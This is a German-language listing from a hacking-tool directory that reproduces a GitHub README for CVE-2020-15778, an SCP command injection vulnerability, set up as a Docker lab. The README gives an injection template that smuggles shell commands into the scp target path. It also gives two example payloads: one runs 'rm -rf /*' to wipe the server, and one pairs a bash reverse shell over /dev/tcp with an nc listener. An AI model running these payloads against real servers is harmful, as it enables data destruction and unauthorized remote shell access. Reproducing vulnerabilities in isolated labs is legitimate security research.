Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-15778 — Reproduziert CVE-2020-15778 SCP command injection exploit mit Docker-basiertem Client-Server-Setup zum Testen von remote code execution und reverse shell payloads. | Kitploit
Tools/GitHubGitHub/yifanzhg/cve-2020-15778
Container-SicherheitSchwachstellenanalyseExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubyifanzhg/cve-2020-15778

CVE-2020-15778

Reproduziert CVE-2020-15778 SCP command injection exploit mit Docker-basiertem Client-Server-Setup zum Testen von remote code execution und reverse shell payloads.

Repository anzeigen
310vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-15778

Einleitung

Dieses Repository reproduziert CVE-2020-15778.

Schritte

  1. Erstellen Sie die Docker-Images für den SCP-Server und -Client
cd client
docker build -t client-cve .
cd server
docker build -t server-cve .
  1. Starten Sie den SCP-Server im Container.
docker run -d -P --name scp-server server-cve

Rufen Sie die interne IP-Adresse des SCP-Servers ab mit

docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-server
  1. Führen Sie den Client im Container aus.
docker run --name scp-client -i -t client-cve
  1. Injizieren Sie Ihren eigenen Shell-Befehl in den SCP-Server, indem Sie den SCP-Befehl im Client ausführen.

Führen Sie im Client-Terminal Folgendes aus:

scp nil.txt root@<internal IP of scp server>:'`your command`/tmp'

Das Passwort ist "PASSWORD".

Beispiele

Hier sind einige Beispiele für diesen Exploit.

  1. Löschen Sie alles auf dem Server, um ihn zum Absturz zu bringen.
scp nil.txt root@<internal IP of scp server>:'`rm -rf /*`/tmp'
  1. Spiegeln Sie die Bash des SCP-Servers in den Client (ähnlich wie SSH).

Hören Sie auf einem Port auf dem Client-Rechner.

nc -lvvp 8080

Verwenden Sie SCP, um den Server zu zwingen, die interaktive Bash in den Client-Rechner zu übertragen.

scp nil.txt root@<internal IP of scp client>:'`bash -i >& /dev/tcp/<internal IP of scp client>/8080 0>& 1`/tmp'

Die IP-Adresse des Clients kann abgerufen werden mit

docker inspect --format='{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' scp-client
Tool herunterladen